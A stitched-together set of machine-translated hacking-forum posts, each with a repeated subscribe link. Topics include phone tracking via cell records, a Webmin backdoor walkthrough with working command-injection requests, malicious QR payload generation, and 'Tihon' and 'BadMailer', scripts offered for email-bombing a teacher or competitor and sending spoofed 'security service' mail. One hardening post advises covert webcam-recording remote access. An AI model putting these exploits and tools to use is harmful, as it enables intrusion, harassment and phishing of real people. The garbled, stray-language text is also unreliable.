Confident in its safety, the criminal leaves home (if he doesn’t leave, it is very likely that his location will be determined immediately or after the fact, after analyzing the logs) and calls from a disposable phone. Where is his main telephone located? Consider the options.

Case 1
Let's start by considering the most typical situation: a “suspicious” call is made from a one-time, “anonymous” phone, while the criminal took his own phone with him. There is nothing unbelievable about this; just read the police reports to understand that this is how the majority works.

The police are requesting CDR records from a mobile operator for the indicated period. Depending on the country and laws in force in it, the operator returns either raw data or an anonymous list of devices (each hardware identifier is replaced with a hash function). In fact, the police receive a ready-made list of devices connected to the cell where the device from which the call was made was registered. It is assumed that among these devices will be present and the criminal's own phone.

Several thousand subscribers can be connected to the same cell at the same time, so a single request will not give the police much. However, if the offender calls the victim again - no matter from the same cell or from another (from another it is even better) - the police will receive additional samples. Next, the sets of devices that were registered in the same cell at the time of making a call from the “anonymous” device intersect; as a rule, only a few dozens or even single identifiers remain in the second or third sample.

Of course, in practice, everything is somewhat more complicated. For example, it takes into account not only the connection to the specific tower with which the call was made, but also data from neighboring towers. Using this data allows (and allowed, by the way, even fifteen years ago) to perform triangulation, determining the location of the device with an accuracy of several tens to several hundred meters. Agree, working with such a selection is noticeably more pleasant.

However, in large cities with a high population density (anonymous calls are often made in crowded places), the circle of suspects, even as a result of the third sample, may be too wide. In such cases (not always, but in especially important cases) the analysis of "big data" comes into play. I managed to find out more about this two years ago from an opening speech at the police congress in Berlin. The analyst examines the behavior patterns of devices indicated by conditional identifiers. Talking on the phone, actively consuming traffic, moving in space, the time of registration in the cell and a number of additional parameters make it possible to exclude a significant part of the devices, thereby significantly reducing the range of suspects.

Conclusion: the easiest way to detect a criminal who has with him a personal device (personal smartphone) and which while moving. I made an anonymous call from one cell - a lot of devices are outlined. Made a second call from another cell - and a list of devices following the same

All that the police need is the raw CDR data and software, with which they can be downloaded and analyzed (the raw data is of little use for manual analysis, but the filtered ones can be displayed in text form or printed).

The popularity of this method of investigation is evidenced by the fact that almost every serious forensic package supports CDR recordings. Examples: Penlink, HAWK Analytics, GeoTime, CSAS, the Russian Oxygen Forensic Suite from Oxygen Software, Advanced Cell Tracking, and many others. However, we had to communicate with the police, who successfully used a bunch of Google Maps and Microsoft Excel in their work.

Without a doubt, the special services are armed with special equipment that allows you to suppress cellular communications, replace the base station, or fake GPS coordinates. That's just the police do not use most of this equipment - at least in the investigation of routine crimes of telephone terrorists and extortionists. Expensive, vain, time-consuming, and by and large not necessary, and sometimes ineffective. Log analysis CDR (Call Detail Record) is a much more efficient investment of time and effort.

The case that occurred several years ago in the UK is indicative. Police monitored one of the bosses of the drug cartel. It is not a problem to detain, but there is no evidence, the case would fall apart in court. According to the police, the phone of the criminal (he used the iPhone) could contain vital evidence, but it was not possible to crack the lock code of a fairly recent model at that time. As a result, an operation was developed; the offender was monitored. As soon as he picked up the phone, unlocked it and started typing, the drug lord was detained, and the phone was literally wrested from his hands.

What’s interesting here is not the backstory, but such an insignificant detail: in order to bring the criminal’s iPhone to the laboratory in an unlocked state, a special policeman was appointed, all of whose work was to periodically swipe your finger across the screen, preventing the device from falling asleep. (You do not need to consider policemen simpletons: everyone knows that there is a setting that controls the time after which the phone’s screen turns off and the phone locks. But it’s easy to set up a configuration profile on the phone with a few clicks that prohibits disabling automatic locking, not everyone knows already.) The phone was successfully brought to the laboratory, the data was extracted, the necessary evidence was received.

Somehow it's all ... unreliable!
If after reading this article you got the impression that it’s somehow not quite right to base the sentence on the data received from mobile operators, I’ll hurry to agree. Moreover, the Danish Supreme Court agrees with you, limiting the use of location data from CDR records by the prosecution. The ban did not come out of the blue: out of 10,700 convictions based on these data (which is a lot for a calm small country), 32 people were found not guilty as a result of additional checks. According to the director of the Telecommunications Industry Association, "this infrastructure was created to provide communications services, and not to monitor citizens." “Attempting to interpret this data leads to errors,” and “evidence that appears to be based on accurate technical measurements does not necessarily have high value in court.”

At most continuing education courses for police officers, they necessarily say that one cannot completely trust digital evidence regardless of the way they were obtained. They talk about cases when the location of a suspect was determined on the basis of metadata from photos that were synchronized through the cloud and not captured by the device itself.

It is significant when the answer to an incoming call was interpreted as “distraction while driving”, which led to an emergency. In fact, the button phone at that time was still lying peacefully in the driver’s pocket, but due to the accidentally pressed button, the phone “answered” the call, which was registered by the operator. The defense was able to justify the driver by interrogating the second subscriber, who testified that the conversation did not take place (by the way, what was “really” there is unknown, but the court sided with the accused).

I am sure such a case is far from the only one. CDR data is a great tool in the hands of an operative, but unreliable as evidence.

Conclusion
What conclusions can be drawn from this article? Now, when almost everyone has a personal smartphone or at least a push-button phone, anyone leaves a “digital footprint”. This track contains significantly more information, and getting to it is much easier than many people realize. To get all the information of interest to the police, only one clue is needed, which can be the hardware identifier of the criminal’s personal smartphone, even if he has never used his personal device for criminal purposes. Getting such a clue is the result of the usual, ru
Subscripe https://anonymoushackers.org/user/hackers-academy

Welcome all.

In this article I would like to talk about how to protect your computer from penetration (it will be useful for IT professionals)
Close access to the Startup folder. (Win + R and enter shell: startup)
Close registry access. (Win + R and enter gpedit.msc> Administrative Templates> Deny access to registry editing tools).
Deny access to the control panel and settings. (Also the policy editor and Admin templates, then click on the Control Panel and Deny access to the control panel, turn it on.)
Remove all unnecessary programs through which you can penetrate. Well, too much.
Change all default passwords from routers, control panels, server, passwords for WiFi and so on
Install a program for remote access on each computer, and it is better to make it secretive. When it penetrates, it will record all actions + a photo from the webcam. (I can make you a guide about this).
Block cmd (console) to all users.
Be sure to set a password on the BIOS and Boot Manager.

If it was useful to someone, like this post) I tried)
Subscripe https://anonymoushackers.org/user/hackers-academy

Welcome all.

In this article, I would like to tell you about the creation of malicious QR codes that you often encounter in everyday life.

Instruction
Install QRGen
First we need to download the repository from github.
After downloading, change the directory with cd.

cd / QRGen

Let's see the README.md file.

Now we need to install some of the requirements and libraries that are required for QRGen.

pip3 install -r requirements.txt

If this command does not work, there is another alternative. Python3 -m pip install -r requirements.txt

Creating malicious QRCode from payload
Now that we have installed QRGen, we will launch it to generate our example of malicious load.

python3 qrgen.py

As you can see, generating a payload is easy.

python3 qrgen.py -l 5

A series of QR codes will be generated, and the last one created will automatically open.

cd genqr

Let's scan our QR code and see.
If it was useful to someone, subscribe to https://anonymoushackers.org/user/hackers-academy

Hello Hackers!
The content of the article
Stand
Details
Demonstration of vulnerability (video)
Conclusion
In the popular server control panel
a vulnerability was discovered that most closely resembles a bookmark left by someone. The attacker as a result can execute arbitrary code on the target system with superuser privileges. Let's see how it works, what the problem is and how to deal with it.
Webmin is completely written in Perl, without the use of non-standard modules. It consists of a simple web server and several scripts - they connect the commands that ensure the execution of the commands that the user gives in the web interface, at the level of the operating system and external programs. Through the web admin panel, you can create new user accounts, mailboxes, change the settings of services and various services and all that sort of thing.
The vulnerability is in the password recovery module. By manipulating the old parameter in the password_change.cgi script, the attacker can execute arbitrary code on the target system with superuser rights, which suggests thoughts of the intentional nature of this bug. Even more suspicious - the problem is present only in ready-made builds of the distribution kit with SourceForge, but it is not in the source code on GitHub.
Stand
To demonstrate the vulnerability, we need two versions of the Webmin distribution kit - 1.890 and 1.920, since the test environments for them are slightly different.
To do this, use two Docker containers.
$ docker run -it --rm -p10000: 10000 --name = webminrce18 --hostname = webminrce18.vh debian / bin / bash
$ docker run -it --rm -p20000: 10000 --name = webminrce19 --hostname = webminrce19.vh debian / bin / bash

Now install the necessary dependencies.
$ apt-get update -y && apt install -y perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl nano wget python apt-show-versions

During the installation of apt-show-versions, I had a problem (in the screenshot below).

And install them.
$ dpkg --install webmin_1.890_all.deb
$ dpkg --install webmin_1.920_all.deb

Now run the Webmin daemons.
$ service webmin start

Version 1.890 is available on the default port of 10000, and 1.920 - at 20,000.
It remains only to set a password for the root user using the passwd command, and the stands are ready. We turn to the details of the vulnerability.
Details
First, we’ll deal with version 1.920. The problem is the password change function, and it is located in the password_change.cgi file. Since the problem affected only the version of the application with SourceForge, you can easily find out what the difference is with the one on GitHub.

We see that the qx function call has been added.
webmin-1.920-github / password_change.cgi
40: $ enc eq $ wuser -> {'pass'} || & pass_error ($ text {'password_eold'});

webmin-1.920-sourceforge / password_change.cgi
40: $ enc eq $ wuser -> {'pass'} || & pass_error ($ text {'password_eold'}, qx / $ in {'old'} /);

Interesting changes. But let's not rush, first we’ll figure out how to get to this part of the code.
At the beginning of the script, it is checked which password policy mode is selected in the settings.
password_change.cgi
12: $ miniserv {'passwd_mode'} == 2 || die "Password changing is not enabled!";

Log in to the Webmin control panel as root and go to the authentication settings (Webmin → Webmin Configuration → Authentication), here you need to find the Password expiry policy item and set it to Prompt users with expired passwords to enter a new one.
Now the passwd_mode variable has a value of 2, which can be checked in the configuration file, and the script will not be interrupted on line 12.

To visually see the form for changing the password, let's go to the user editing section and create a test user. Here we set the option Force change at next login.
Now, when authorizing on his behalf, the system will ask you to set a new password. The data of this form will be sent to the password_change.cgi script.

So, fill out the form, send and intercept the request. Now back to the script. The $ in array contains user data that is passed in the body of the POST request.
password_change.cgi
15: $ in {'new1'} ne '' || & pass_error ($ text {'password_enew1'});
16: $ in {'new1'} eq $ in {'new2'} || & pass_error ($ text {'password_enew2'});

Here it is checked that a new password has been set (variable new1) and it has been entered correctly both times (new1 == new2).
Next, Webmin checks for the presence and possibility of using the acl module (access-control list).
password_change.cgi
19: if (& foreign_check ("acl")) {

If there is such a module, then load it.
20: & foreign_require ("acl", "acl-lib.pl");

From the name it’s clear that the module works with an access control list. It performs various operations with users: editing, changing passwords and rights.
The script selects a user from the list of users who needs to set a new password. The username is taken from the user field of the password change form.
password_change.cgi
21: ($ wuser) = grep {$ _-> {'name'} eq $ in {'user'}} & acl :: list_users ();

Let's play some testers and look at the $ wuser variable. To do this, add the inclusion of a module in the scriptafter which it will be possible to display information about the variables using the Dumper ($ var_name) construct.
password_change.cgi
6: use Data :: Dumper;
...
21: ($ wuser) = grep {$ _-> {'name'} eq $ in {'user'}} & acl :: list_users (); print Dumper ($ wus

There are two types of users in Webmin: system users, which exist directly in the OS, and internal users of the application. You can find the list of system users in Linux in the / etc / passwd file, and Webmin information is taken from it. Therefore, for such users, the pass property will have the value x.
Если мы будем использовать такого юзера в форме смены пароля, то это не позволит нам попасть в нужное условие и добраться до нужного участка кода.
$wuser = {
'name' => 'root',
'pass' => 'x',
'readonly' => undef,
'lastchange' => '',
'real' => undef,
'twofactor_apikey' => undef,
'lang' => 'ru.UTF-8',
...
};

password_change.cgi
22: if ($wuser->{'pass'} eq 'x') {
23: # A Webmin user, but using Unix authentication
24: $wuser = undef;
25: }
...
37: if ($wuser) {
38: # Update Webmin user's password
39: $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
40: $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);

Если ты поставишь вывод значения переменной прямо перед условием, то увидишь, что при попытке изменить пароль системному пользователю она будет иметь значение undef.
password_change.cgi
37: print Dumper($wuser); if ($wuser) {
38: # Update Webmin user's password
39: $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});

However, not everything is so bad. If you specify a nonexistent user, the variable will become empty, but not indefinite. And in this case, the condition if ($ wuser) will be considered true.
password_change.cgi
37: print Dumper ($ wuser); if ($ wuser) {
38: # Update Webmin user's password
39: die 'We are here!'; $ enc = & acl :: encrypt_password ($ in {'old'}, $ wuser -> {'pass'}); Here the old password that we submitted in the form is compared with the current user password. Naturally, this part of the expression will be false, since no user nonexistentuser exists. Therefore, the second part of the condition is fulfilled, where an error message is displayed, and what is returned by the qx / $ in {'old'} / construct is added to it.
password_change.cgi
37: if ($ wuser) {
...
39: $ enc = & acl :: encrypt_password ($ in {'old'}, $ wuser -> {'pass'});
40: $ enc eq $ wuser -> {'pass'} || & pass_error ($ text {'password_eold'}, qx / $ in {'old'} /);

What is this function -? This is an alternative to using backticks to execute system commands. You can use any characters as delimiters, in our case it is /. That is, in simple terms, a command will be executed that is transmitted as the user's old password.
Let's test this and try passing, for example, uname -a.
POST /password_change.cgi HTTP / 1.1
Host: webminrce19.vh: 20000
Content-Length: 52
Content-Type: application / x-www-form-urlencoded
Referer:
user = nonexistentuser & pam = 1 & expired = 2 & old = uname + -a & new1 = any & new2 = any

Voila! The command was executed, and pass_error kindly provided the result of its work on the screen.
Thus, if the password policy Webmin 1.920 allows you to request new authentication data from users with expired passwords, then with this configuration, remote execution of commands on behalf of the superuser is possible.
We figured out this version, now let's move on to the older 1.890.
Again, compare the password_change.cgi file from two sources.
Webmin-1.890-github / password_change.cgi
12: $ miniserv {'passwd_mode'} == 2 || die "Password change is not enabled!";

Webmin-1.890-sourceforge / password_change.cgi
12: $ in {'expired'} eq '' || die $ text {'password_expired'}, qx / $ in {'expired'} /;

There is a similar construction with qx - qx / $ in {'expired'} /, only in this case it was used even more boldly.
Turning to the fact that instead of checking the password policy, a simple check of the variable $ in {expired 'is used. $ In is the user data from the request. Expired on request to script. It will be done. A command simply points to a command.
POST /password_change.cgi HTTP / 1.1
Host: webminrce18.vh: 10000
Content Length: 52
Content Type: application / x-www-form-urlencoded
Referer:expired = id

And the server will return the result of its execution.

Conclusion
Today we learned that you should not blindly trust even sources such as

If there are several ways to download applications, then you can verify their checksums. And if you put the distribution kit on a server where work with important data will go, then this item becomes even more relevant.
If you are a developer yourself, then often check what you download to different resources: versions should not diverge. Better yet, use some kind of automatic source audit tool that will warn of suspicious finds. This, of course, is not a panacea, but in such cases it can help out.
If you already use Webmin and want to get rid of the described bookmark, then it is simple. It is enough to remove the qx function call, and also return the passwd_mode check in Webmin version 1.890.
Subsricpe https://anonymoushackers.org/user/hackers-academy

Hello!
I want to introduce you to Tikhon.
Tihon is my Python program for spamming your victim’s email specifically for ufolabs.net
What is the essence of this program? The program sends one email every second to the specified address of the victim (cool, isn't it?) With the content that you can specify. The funniest thing is that not a single email service will determine that this is spam, so all emails will go to your Inbox.
In order to install Tikhon, open our familiar Kali Linux terminal and enter these commands:
cd TihonTheSpammer
python3 Tihon.py
If you did everything correctly, then this window will appear:

Next, indicate the victim's email address
After which the program will ask if the text of the letter "This is SPAM" suits us, if we do not want to change it, write "n"
Then we select how many letters you need to send to the victim, and press "Enter"

The sending process begins, the victim will receive this (click to zoom):


Even the icon is suitable)

If we want to change the text of the letter, then write "y"Then, the steps to select the number of letters and the actual sending are repeated.

Now about the details.
I wrote it in a day.
There are many applications for the program.
For example, here you have a friend, your teacher or competitor. And you need to disable it, it is for this that this program exists. After all, if you run it in several windows, then your competitor will be raking up all the trash that will be in his mail for a very long time. After running the program for 1000 letters, to go for a walk or to be distracted, the competitor’s mail will be overloaded.

I will be very happy if you test the program, but only at your own peril and risk. Although, I say this on the hacker forum ...
Subscripe https://anonymoushackers.org/user/hackers-academy

Hello!
Let's start with the preface.

1. Each of the novice hackers and those who are interested in this topic is a script kiddy. The Kiddy script is a person who uses existing programs, but who is not able to write such software himself. And each of us overcomes the line kiddy script. It is important to note that it does not matter whether you wrote your program or not, most importantly you are more than just copy-paste.
2. I'm mostly special. in SI and phishing. I believe that these are perfect hacking methods, because as almost all known hackers said: the main vulnerability of the system is a person. I am looking for and testing different programs on this topic, what I am sharing with you on this forum.
   Every SI probably knows a program in Kali - SEToolkit. In the C section of this program there is a section that is responsible for sending fake mail. However, for me, like for others, it did not start, and I was very furious.

And so, comparing all of the above together, I decided to make my own utility.
Since I program in Python and understand it, I wrote a simple program that we all need so much.

About BadMailer
This program sends emails to the specified victim. Sending occurs with the fake mail "[email protected]".
Nothing more to say.

We proceed to the installation.

We open the familiar Kali Linux Terminal and enter these commands, one after another:
Download BadMailer
cd BadMailer
python3 badmailer.py
If you did everything correctly, you should have this window pop up:

If you agree with all the risks (problems if they find you), then write "y"
The next step is to open this window:

Here we indicate the victim’s mail, message (IMPORTANT! IF YOU WANT TO LEAVE THE LINE, WRITE IN ENGLISH BIG LETTERS ENTER)
The program makes sure that you are sure you want to send this letter with this message. We write "y" if you agree.
After that, the program will confirm the sending.

Here's a letter like this coming to the victim’s mail:

As we see, a letter came from ... a security service? Look, there’s even an icon ...

Experienced social the engineer will find many applications for this program, which you decide.
Subscripe https://anonymoushackers.org/user/hackers-academy

@archdammed Hello Subscripe https://anonymoushackers.org/user/hackers-academy

Group-IB experts recorded several cases of Telegram hacking.

Towards the end of the year, entrepreneurs turned to specialists complaining of unauthorized access to their profiles in the messenger. Moreover, it does not matter which operating system or operator.

At some point, the user received a message with the access code in the Telegram service channel, and then he was duplicated on the smartphone in the form of SMS. After a few seconds, the user received a notification about the successful authorization from the new device.

Each hacking took place on a mobile network, the attackers used disposable SIM cards. Often, the IP address of the hackers was in Samara, but it could be a substitute address.

Specialists carefully studied the smartphones of entrepreneurs, but did not find any signs of remote hacking, virus or SIM-card spoofing. Attackers intercepted SMS with an activation code. It is understood that using insider information from the operators.

The only reliable way to protect Telegram is two-factor authentication. When authorizing in the profile, an additional password is required, which is set by the account owner.

1. Open the menu Settings -> Privacy -> Cloud Password in Telegram.

2. We create a password.
   Subscripe https://anonymoushackers.org/user/hackers-academy

Researchers from the University of New Mexico have discovered a vulnerability affecting Ubuntu, Fedora, Debian, FreeBSD, OpenBSD, macOS, iOS Android, and other Unix-based OSs. The problem allows you to listen, intercept and interfere with the operation of VPN connections.

The bug got the identifier CVE-2019-14899, and the root of the problem lies in the network stacks of a number of Unix-based operating systems, or rather, in the way these OSs respond to unexpected network packets. An attacker can use the vulnerability to "probe" the device and identify various details about the status of the user's VPN connection.

Attacks can be performed on behalf of a malicious access point or router, or an attacker can be present on the same network to determine if another user is connected to the VPN, find out his virtual IP address assigned by the server, and determine whether the victim is connected to a specific site. Even worse, the bug allows you to determine the exact sequence of packets in certain VPN connections, which can be used to inject into the TCP data stream and compromise the connection.

Researchers report that they have successfully exploited the vulnerability in the following operating systems, and also write that the problem extends to Android, iOS and macOS:

Ubuntu 19.10 (systemd)

Fedora (systemd)

Debian 10.2 (systemd)

Arch 2019.05 (systemd)

Manjaro 18.1.1 (systemd)

Devuan (sysV init)

MX Linux 19 (Mepis + antiX)

Void Linux (runit)

Slackware 14.2 (rc.d))

Deepin (rc.d)

FreeBSD (rc.d)

OpenBSD (rc.d)

It is emphasized that the attack works against OpenVPN, WireGuard, and IKEv2 / IPSec, and so on, since the VPN technology itself does not matter, nor does the use of IPv4 or IPv6.
Subscripe https://anonymoushackers.org/user/hackers-academy